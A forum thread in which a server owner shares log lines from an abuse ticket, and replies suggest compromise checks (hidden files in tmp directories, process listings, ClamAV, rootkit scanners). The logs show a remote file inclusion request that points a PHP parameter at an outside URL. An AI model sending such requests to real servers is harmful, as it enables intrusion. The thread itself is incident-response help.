Hi everybody,

Can anybody help me with this issue? I've got ticket from Abuse Team. What does this mean? I changed all passwords: ftp's, root, admin and some strange server password. What next? Anyone knows at least what should I search in Google to solve this problem?

Dear Customer, bla-bla-bla

For your convenience, please see attached report.

Request: websearch.ramaui.com 207.44.***.** - - [26/Aug/2008:01:30:27
-0500]" GET /smartframe/search.php?Task=http://wiminternational.org/n?
HTTP/1.1" 500 550 " -" " libwww-perl/5.79" - " -"

Request: websearch.ramaui.com 207.44.***.** - - [26/Aug/2008:01:30:28
-0500]" GET /smartframe/search.php?Task=http://wiminternational.org/n?
HTTP/1.1" 500 550 " -" " libwww-perl/5.79" - " -"

Request: websearch.ramaui.com 207.44.***.** - - [26/Aug/2008:01:30:29
-0500]" GET /smartframe/search.php?Task=http://wiminternational.org/n?
HTTP/1.1" 500 550 " -" " libwww-perl/5.79" - " -"

Request: websearch.ramaui.com 207.44.***.** - - [26/Aug/2008:01:30:42
-0500]" GET /smartframe/search.php?Task=http://wiminternational.org/n?
HTTP/1.1" 500 550 " -" " libwww-perl/5.79" - " -"

You only posted half of the ticket, what did they say to you? It sounds like your server might be launching attacks against other servers. They probably got in via a php injection and are running some processes on your server without ever having to login with a password.

Thank you for your reply!

I did not post the first part, because it seems to be automatically generated text with no any useful information. Anyway here is the missing part:

We have received reports of unauthorized access attempts originating from this server. This indicates possible server compromise, and is your responsibility to investigate and resolve. However, should you require help, please contact our professional service. Be advised that should we receive further reports we may be forced to step in to prevent further abuse of our networks.

How can I find vulnerable hole in my server? How can I find already installed script (if it exists)? And finally how can I prevent it in future?

Greetings:

URL Injection attacks typically mean the server for which the IP address of the attacker is bound is a compromised server.

Please check the server behind the IP address above for suspicious files in /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox, /var/spool/squid, and /var/spool/cron Please use "ls -lab" for checking directories as sometimes compromised servers will have hidden files that a regular "ls" will not show.

Please also check the process tree (ps -efl or ps -auwx) for suspicious processes; often times the malware / hack pretends to be an Apache process.

Clam Anti-virus, clamscan, can also be used to find commonly used PHP and Perl-based hacks, including various php shells, on a server using the “--infected” and “--recursive” options.

You may also want to check out using root kit detection tools - http://www.chkrootkit.org/, http://www.rootkit.nl/, and http:// http://www.ossec.net/en/rootcheck.html as tools which should be used in addition to checking the directories and process tree.

If you use cpanel, consider also using nobody check from http://www.webhostgear.com/353.html

Thank you.